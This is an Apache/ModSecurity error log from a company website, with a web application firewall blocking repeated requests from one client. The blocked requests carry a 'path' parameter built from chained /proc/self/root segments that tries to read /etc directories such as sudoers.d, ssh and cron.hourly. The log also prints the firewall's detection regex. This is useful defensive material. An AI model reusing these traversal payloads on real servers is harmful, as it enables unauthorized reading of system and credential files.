[Fri Mar 20 08:28:39.147463 2026] [:error] [pid 10189:tid 140411540502272] [client 74.7.243.128:44474] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vZzJ3M9BSuKP7CAYiVwAAAJg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:28:40.835959 2026] [:error] [pid 7893:tid 140411599251200] [client 74.7.243.128:37494] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vaBCii7xarUs8iHZsOQAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:28:43.480342 2026] [:error] [pid 7235:tid 140411741927168] [client 74.7.243.128:37506] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0va_qxLDW4GITHUkTt_gAAAQA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:28:44.762814 2026] [:error] [pid 21219:tid 140411624429312] [client 74.7.243.128:37518] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vbPXLqtnMIWvjpaKftgAAAo4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:28:45.947221 2026] [:error] [pid 11642:tid 140411666392832] [client 74.7.243.128:37530] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vbbninkcc-iUj5ApjKwAAA4k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:28:49.516348 2026] [:error] [pid 11642:tid 140411574073088] [client 74.7.243.128:37536] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vcbninkcc-iUj5ApjLgAAA5Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:28:50.817571 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.243.128:56710] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vcta6ubjKNq_cu4baGgAAA0k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:28:57.349299 2026] [:error] [pid 11167:tid 140411691570944] [client 74.7.243.128:56720] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vefHIg5MgXLBnicP8xwAAAcY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:28:59.883708 2026] [:error] [pid 11642:tid 140411674785536] [client 74.7.243.128:56726] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ve7ninkcc-iUj5ApjMgAAA4g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:29:01.289161 2026] [:error] [pid 7893:tid 140411691570944] [client 74.7.243.128:51092] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vfRCii7xarUs8iHZsRAAAAgY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:29:51.512640 2026] [mime_magic:error] [pid 26799:tid 140411658000128] (70014)End of file found: [client 57.141.18.15:42298] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 08:29:52.999054 2026] [:error] [pid 7893:tid 140411582465792] [client 74.7.244.43:46726] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab0vsBCii7xarUs8iHZsXQAAAhM"]
[Fri Mar 20 08:29:54.487132 2026] [:error] [pid 7235:tid 140411599251200] [client 74.7.243.128:51104] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vsvqxLDW4GITHUkTuQAAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:30:00.289119 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.243.128:46798] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vuNa6ubjKNq_cu4baSQAAA1I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:30:01.637038 2026] [:error] [pid 9818:tid 140411691570944] [client 74.7.243.128:59026] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vuV1pVZ5mVmJwsFM2UgAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:30:04.890221 2026] [:error] [pid 11167:tid 140411540502272] [client 74.7.243.128:59036] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vvPHIg5MgXLBnicP9AQAAAdg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:30:06.681988 2026] [:error] [pid 11642:tid 140411548894976] [client 74.7.243.128:59050] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vvrninkcc-iUj5ApjSQAAA5c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:30:09.189990 2026] [:error] [pid 7893:tid 140411674785536] [client 74.7.243.128:59062] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vwRCii7xarUs8iHZsYgAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:30:11.989824 2026] [:error] [pid 21219:tid 140411708356352] [client 74.7.243.128:42030] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vw_XLqtnMIWvjpaKf3wAAAoQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:30:13.303617 2026] [:error] [pid 7235:tid 140411708356352] [client 74.7.243.128:42044] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vxfqxLDW4GITHUkTuSQAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:30:14.460443 2026] [:error] [pid 11642:tid 140411699963648] [client 74.7.243.128:42054] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vxrninkcc-iUj5ApjTQAAA4U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:30:19.051947 2026] [:error] [pid 31215:tid 140411649607424] [client 74.7.243.128:42060] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vywF0L0L-SsrnPo5uDQAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:30:30.803158 2026] [:error] [pid 31215:tid 140411557287680] [client 74.7.243.128:49480] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0v1gF0L0L-SsrnPo5uMQAAAtY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
